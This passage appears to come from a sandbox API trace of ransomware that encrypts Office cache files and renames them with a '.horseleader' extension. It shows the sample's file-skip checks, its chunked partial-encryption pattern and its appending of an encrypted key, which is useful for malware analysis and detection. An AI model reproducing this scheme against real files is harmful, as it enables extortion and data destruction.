Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\ose.exe.horseleader")) returned 1 [0219.318] GetProcessHeap () returned 0x780000 [0219.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.318] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0219.318] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0219.318] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.318] StrStrIW (lpFirst="osetup.dll", lpSrch=".horseleader") returned 0x0 [0219.318] lstrcmpW (lpString1="osetup.dll", lpString2="#Decrypt#.txt") returned 1 [0219.318] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0219.318] lstrlenW (lpString=".testttjffg") returned 11 [0219.318] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll", lpSrch=".testttjffg") returned 0x0 [0219.318] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.318] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.319] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.323] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0219.323] StrStrW (lpFirst="osetup.dll", lpSrch=".txt") returned 0x0 [0219.323] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=7378792) returned 1 [0219.323] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.323] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.326] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.327] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.328] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3823b4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.328] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.374] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.374] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.375] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x704768, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.375] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.381] CloseHandle (hObject=0x21c) returned 1 [0219.382] GetProcessHeap () returned 0x780000 [0219.382] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.382] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader") returned 89 [0219.382] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\osetup.dll.horseleader")) returned 1 [0219.383] GetProcessHeap () returned 0x780000 [0219.383] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.383] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0219.383] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0219.383] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.383] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".horseleader") returned 0x0 [0219.383] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="#Decrypt#.txt") returned 1 [0219.383] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0219.383] lstrlenW (lpString=".testttjffg") returned 11 [0219.383] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab", lpSrch=".testttjffg") returned 0x0 [0219.383] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.384] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.384] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.384] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0219.387] StrStrW (lpFirst="OWOW32WW.cab", lpSrch=".txt") returned 0x0 [0219.387] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=36233052) returned 1 [0219.387] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.388] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.393] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.393] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.394] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x11447ae, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.395] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.397] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.397] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.397] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2288f5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.397] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.400] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.400] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.400] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.400] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.400] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.401] CloseHandle (hObject=0x21c) returned 1 [0219.401] GetProcessHeap () returned 0x780000 [0219.401] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.401] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader") returned 91 [0219.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\owow32ww.cab.horseleader")) returned 1 [0219.402] GetProcessHeap () returned 0x780000 [0219.402] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.402] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0219.402] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0219.402] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.402] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".horseleader") returned 0x0 [0219.402] lstrcmpW (lpString1="PidGenX.dll", lpString2="#Decrypt#.txt") returned 1 [0219.402] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0219.402] lstrlenW (lpString=".testttjffg") returned 11 [0219.402] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpSrch=".testttjffg") returned 0x0 [0219.402] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.402] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.402] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.404] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.404] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0219.404] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1463568) returned 1 [0219.404] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.404] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.407] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.407] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.407] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.407] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.410] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.410] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.410] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.412] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.412] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.412] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.412] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.413] CloseHandle (hObject=0x21c) returned 1 [0219.413] GetProcessHeap () returned 0x780000 [0219.413] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.413] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader") returned 90 [0219.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pidgenx.dll.horseleader")) returned 1 [0219.414] GetProcessHeap () returned 0x780000 [0219.414] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.414] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0219.414] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0219.414] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0219.414] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0219.414] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0219.414] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0219.414] lstrlenW (lpString=".testttjffg") returned 11 [0219.414] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0219.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.414] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.415] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0219.415] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0219.415] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=715834) returned 1 [0219.415] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.415] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.417] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.417] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.422] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.422] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.424] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.424] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.424] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.424] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.426] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.426] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, 